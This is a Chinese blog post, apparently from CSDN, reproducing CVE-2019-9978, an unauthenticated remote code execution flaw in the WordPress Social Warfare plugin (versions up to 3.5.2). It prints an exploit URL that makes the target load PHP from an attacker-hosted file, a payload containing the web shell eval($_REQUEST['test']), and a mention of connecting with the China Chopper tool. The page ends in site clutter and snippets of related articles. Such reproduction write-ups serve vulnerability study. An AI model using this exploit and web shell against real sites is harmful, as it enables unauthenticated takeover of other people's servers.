WordPress social-warfare插件XSS和RCE漏洞

最新推荐文章于 2024-06-12 09:13:13 发布
最新推荐文章于 2024-06-12 09:13:13 发布
阅读量1k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: wordpress xss 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45551083/article/details/107443027
版权

文章目录

WordPress social-warfare插件XSS和RCE漏洞

漏洞编号 : CVE-2019-9978

影响版本 : WordPress social-warfare < 3.5.3

漏洞描述 : WordPress是一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。social-warfare plugin是使用在其中的一个社交平台分享插件,其3.5.3之前版本存在跨站脚本攻击(XSS)和远程代码执行(RCE)漏洞。远程攻击者可借助这些漏洞,运行任意PHP代码,在无需身份验证的情况下实现对网站和服务器的控制。

攻击成功的条件只需要如下两条:

  1. 目标wordpress站点上安装有social-warfare
  2. social-warfare插件的版本小于或等于3.5.2

漏洞分析 : https://paper.seebug.org/919/

RCE

http://127.0.0.1/wordpress/wp-admin/[xxx].php?swp_debug=load_options&swp_url=http://127.0.0.1/1.php

构造

<pre>
    phpinfo();
	eval($_REQUEST['test'])
</pre>
利用 :
http://1.1.1.1/wordpress/wp-admin/index.php?swp_debug=load_options&swp_url=http://*.*.*.*/rce.txt&test=phpinfo();

放在我们的恶意站点下 比如

http://10.1.1.200/rce.php

菜刀连接

POC

# Title: RCE in Social Warfare Plugin ( <=3.5.2 )
# Date: March, 2019
# Researcher: Luka Sikic
# Exploit Author: hash3liZer
最低0.47元/天 解锁文章
lonmar~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Plants Vs. Zombies Garden Warfare 2-crx插件
04-05
它配备了一些很酷的属性,可以改善您的新标签体验,如: - 具有每个新标签的高品质壁纸 - 当前日期/时间 - 与社交网络和购物网站的快捷方式链接 我们将为您添加更多功能,让您在浏览器上具有更好的体验。...
WordPress Social Warfare插件XSSRCE漏洞分析(CVE-2019-9978
systemino的博客
04-25 2226
一、概述 3月21日,研究人员披露了Social Warfare中存在的两个漏洞,这是WordPress中一个非常受欢迎的插件,可以将社交网络分享按钮添加到网站或博客中。其中,一个是存储型跨站脚本攻击(XSS漏洞,另一个是远程代码执行RCE漏洞,这两个漏洞共同获得CVE-2019-9978编号。在3.5.3版本之前所有版本的Social Warfare中都存在这两个漏洞。3月21日,发布了...
WordPress social-warfare插件XSSRCE漏洞CVE-2019-9978
XZ_______的博客
04-17 554
在一个宁静的小镇上,小牛是一位资深的网络安全专家。他深知,网络安全不仅仅是防止黑客攻击,更重要的是提前进行信息收集和分析,以便更好地了解潜在的威胁。有一天,李明接到了一家大型企业的邀请,希望他能协助进行一次全面的网络安全评估。李明欣然接受了这个挑战,并立即开始了准备工作。他首先通过搜索引擎和社交媒体平台,搜集了关于这家企业的各种信息。他仔细阅读了公司的官方网站、新闻报道、员工评论等,以了解企业的业务规模、组织架构、技术架构以及可能存在的安全漏洞
【勒索来袭】vulntarget-n靶场搭建& 打靶流程
最新发布
crowsec
06-12 1046
vulntarget-n是一个模拟全球化勒索病毒高发环境下的应急响应和取证分析案例,其模拟了一个正常运行的业务服务被勒索病毒攻击的情景
RCE姿势学习:从存储型XSS漏洞RCE利用
2301_79205724的博客
08-31 408
很多同学在挖掘漏洞的中期都会有一个疑问:为什么别人挖到的都是高危或者严重漏洞,而我总是只能挖到一些信息泄露或者常规的XSS呢?来询问这个问题的人其实非常非常多,但其实归根结底都是一个原因,漏洞没有深入利用。所以今天咱们就来学习一下大佬们是怎么利用一个XSSRCE的思路吧。后续利用RCE的内容比较难,需要有一定编程能力才能比较好理解,所以前面说到漏洞没有深入利用的问题,其原因百分之八十是源于你基础不够扎实,你的“地基”决定了你的高度,所以呀学习千万不能图快学成个脚本小子哦。
XSSRCE 的几个开源案例
qq_18209847的博客
12-13 416
演示了如何通过 xss 漏洞升级为命令执行漏洞,核心还是要依赖系统本身的功能或者所依赖的系统存在文件上传、命令执行等问题,否则无法直接通过 xss 漏洞实现命令执行。通常应用系统的管理后台功能丰富,权限很高,包括了任意文件上传、修改,以及数据库操作、命令执行等能力,然后通过 xss 漏洞,让管理员访问后执行后台的功能,获得更高的权限,实战中,如果是开源系统,能够很好的分析并实现利用,如果是未知系统,那么很难了解后台的功能,也不是很好利用转载自: Aleksey Solovev 信安之路。
文件上传漏洞XSS漏洞RCE漏洞
Fly_Mojito的博客
05-27 1077
文件上传漏洞、XXS漏洞RCE漏洞
浅谈xss
blackguest07的博客
02-02 224
xss,从 0 到 小皮面板linux,rce执行
Blocky Gun 3D Warfare Multiplayer-crx插件
04-06
无论如何,你得到了砍刀和五种类型的武器,所以你有很多选择来结束你贫穷的对手。 如果你对杀害普通士兵感到无聊,不要担心,我们没有忘记,我们有嗜血僵尸模式为你(规则很简单:生存并杀死移动的一切)。 九个新...
Splitgate: Arena Warfare New Tab-crx插件
04-06
在每个新选项卡上均包括竞技场射击游戏Splitgate:Arena Warfare的高清图像。 对于门户网站的粉丝! 在每个新选项卡上均包括竞技场射击游戏Splitgate:Arena Warfare的高清图像。 对于门户网站的粉丝! 请给我们评分...
听老外讲解如何将XSS转化为RCE
weixin_33912445的博客
09-12 603
本文讲的是听老外讲解如何将XSS转化为RCE, 前言 Black Hat 2017可谓成果丰硕,除了各种安全工具和理论出现之外,也出现了许多新的安全研究方向,比如Doyensec的联合创始人Luca Carettoni就介绍了关于Electron安全方面的新思路https://twitter.com/lucacarettoni。为了对他的这个思路有...
无参数 rce.md
04-01
记录一下,关于这次比赛的 wp >.< 并向大佬们积极学习 >.< 顺便混点分
WordPress插件Social Warfare<=3.5.2 无需登录RCE漏洞
weixin_30672019的博客
04-30 611
  该漏洞只存在于Social Warfare插进的3.5.0、3.5.1和3.5.2版本中,其他版本不存在。   2019年3月21日插件作者紧急发布了3.5.3版本以修复高危的RCE漏洞,在<=3.5.2版本中存在一处无需登录即可getshell的RCE漏洞漏洞分析 在/wp-content/plugins/social-warfare/lib/utilities/SWP_...
wordpress运行c语言,WordPress中的某个XSS或导致代码执行
weixin_42382703的博客
05-25 157
使用Gutenberg编辑器的网站(和WordPress 5.0到5.2.2相关联)或因一个XSS漏洞而被攻击者非法接管。根据近期的一项安全分析,WordPress中一个刚刚修复的XSS漏洞可造成代码执行。这个漏洞存在于WordPress内置的编辑器Gutenberg中,主要涉及WordPress 5.0或更高版本。FortiGuard Labs的威胁研究人员Zhouyuan Yang表示,如果文...
wordpress 5.0.0 远程代码执行漏洞分析cve-2019-8943
whatday的专栏
08-25 2607
近日,wordpress发布一个安全升级补丁,修复了一个WordPress核心中的远程代码执行漏洞代码修改细节可以参考wordpress团队于Dec 13, 2018提交的代码。据漏洞披露者文中所介绍,这个漏洞WordPress核心中被发现已经超过6年。 https://github.com/WordPress/WordPress/commit/7bd776bdb3f496898bba46959066c2c4aa8723d1#diff-c3d5c535db5622f3b0242411ee5f9.
WordPress5.0.0 远程代码执行
nuaa_llf的博客
03-04 3885
原文链接:https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ 这篇博文讲述了利用目录穿越和本地文件包含漏洞的“组合拳”在WordPress核心功能实现远程代码执行。过去6年,该WordPress漏洞一直未被揭示。 影响 【POC视频1】 攻击者需要在目标WordPress网站拥有至少作者级权限的账户,然后就...
wordpress漏洞_漏洞预警|WordPress 5.0.0远程代码执行漏洞
weixin_39778106的博客
12-12 1387
漏洞预警|WordPress 5.0.0远程代码执行漏洞2019-03-17事件来源‍‍‍‍‍近日,RIPS团队在官网公开了一篇WordPress 5.0.0 Remote Code Execution,CVE编号CVE-2019-6977,漏洞是在author权限账号下,可以通过修改Post Meta变量覆盖、目录穿越写文件、文件包含3个漏洞构成一个RCE漏洞漏洞描述此漏洞存在于5....
Windows 0day提权漏洞分析CVE-2019-0859
blackorbird的博客
04-15 1191
CVE-2019-0859MicrosoftWin32k特权提升漏洞[CVE-2019-0859] 当Win32k组件无法正确处理内存中的对象时,Windows中存在一...
PHPSTUDY xss+csrf RCE漏洞
m0_63028223的博客
02-08 534
产生的原因是,小皮面板管理后台会显示登录信息,会将用户登录失败的信息也显示出来,且未进行任何过滤。而且小皮面板有一个计划任务的功能,可以实现命令执行因此存在rce漏洞。最近小皮面板爆出来一个高位的RCE漏洞,跟风赶紧来复现一下。在用户名输入框输入xss测试语句,密码随便填登录。安装成功会弹出一个”小皮面板初始信息.txt“安装小皮面板,下载完安装包后傻瓜式一键安装。起一个http服务,构造csrf poc。在用户登录框插入xss payload。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值